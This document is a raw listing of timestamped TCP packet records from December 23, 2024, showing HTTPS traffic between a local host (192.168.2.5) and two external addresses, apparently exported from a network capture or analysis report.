                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.833612919 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.834295034 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.835820913 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.835930109 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.841640949 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.842477083 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.149271965 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.150192976 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.150429010 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.150542974 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.151098013 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.151343107 CET44351560172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.153383017 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.153968096 CET51560443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.449353933 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.449402094 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.625082016 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626135111 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626234055 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626245022 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626485109 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626494884 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.626653910 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627441883 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627549887 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627559900 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627753973 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627799988 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.627928972 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.636369944 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.636785030 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.637032032 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.637064934 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.637295008 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.637542009 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.409863949 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.418138981 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.425739050 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.426069021 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.443128109 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.456087112 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.456110954 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.456423998 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.460021019 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.460266113 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.469568014 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.477142096 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.477359056 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.485838890 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.494016886 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.494246006 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.502398014 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.510329962 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.510514975 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.519066095 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.526813030 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.527070999 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.535017014 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.543059111 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.548475027 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.553061962 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.557384968 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.557637930 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.564409018 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.571729898 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.575496912 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.583508015 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.585460901 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.585863113 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.592082024 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.596673965 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.598772049 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.600476980 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.602838039 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.603365898 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.606134892 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.609455109 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.610925913 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.612610102 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.616202116 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.619199991 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.622606039 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.625644922 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.629055023 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.632814884 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.636203051 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.639420986 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.646218061 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.646322966 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.646866083 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.646959066 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.647095919 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.647113085 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.647171974 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.648463011 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.648792982 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.651726007 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.655041933 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.657598972 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.661070108 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.663203955 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.665765047 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.669115067 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.672537088 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.675069094 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.677330971 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.677500010 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.680609941 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.683815002 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.685995102 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.688981056 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.693269014 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.693347931 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547408104 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547420025 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547430992 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547497988 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547512054 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547522068 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547533035 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.547547102 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.549422979 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.549422979 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.549762964 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.550251007 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.550601959 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.567028999 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.569303989 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.577342033 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.661293030 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.663458109 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.664522886 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.664796114 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.882287979 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.882960081 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.884022951 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.884540081 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.887468100 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.888590097 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:36.971577883 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.042985916 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.063316107 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.120767117 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.122467995 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.123714924 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.124780893 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.125073910 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.358738899 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.359569073 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.379544020 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.381906033 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.382225990 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443145037 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443176985 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443341970 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443351030 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443358898 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443367004 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443373919 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443384886 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443483114 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.443978071 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.444353104 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.446794033 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.447669983 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.448730946 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.448843002 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.452737093 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.483596087 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.764446974 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.765275955 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.766546965 CET44354586172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.766712904 CET54586443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.767710924 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.782334089 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.796336889 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899239063 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899374008 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899427891 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899439096 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899698973 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.899746895 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.928545952 CET57034443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.929054976 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.240565062 CET4435703423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.242995024 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.248723030 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.248812914 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.248856068 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.249047041 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.249082088 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.735321045 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.735482931 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747102022 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747208118 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747222900 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747406006 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747428894 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747440100 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747450113 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747936010 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747946978 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.747957945 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.748233080 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.761833906 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.761913061 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.761923075 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762115955 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762269020 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762279987 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762331009 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762526989 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762553930 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762563944 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.762574911 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.781765938 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.781892061 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.781925917 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782186985 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782219887 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782259941 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782282114 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782576084 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782579899 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782603979 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.782615900 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.793833971 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.793853045 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794488907 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794625044 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794662952 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794889927 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794898987 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794909954 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794919014 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.794929028 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.795444012 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.795454025 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.796714067 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.797040939 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812294006 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812391996 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812426090 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812673092 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812684059 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812699080 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812710047 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.812915087 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.813103914 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.813114882 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.813126087 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.819142103 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.819210052 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.819245100 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.819437027 CET53444443192.168.2.523.209.72.32
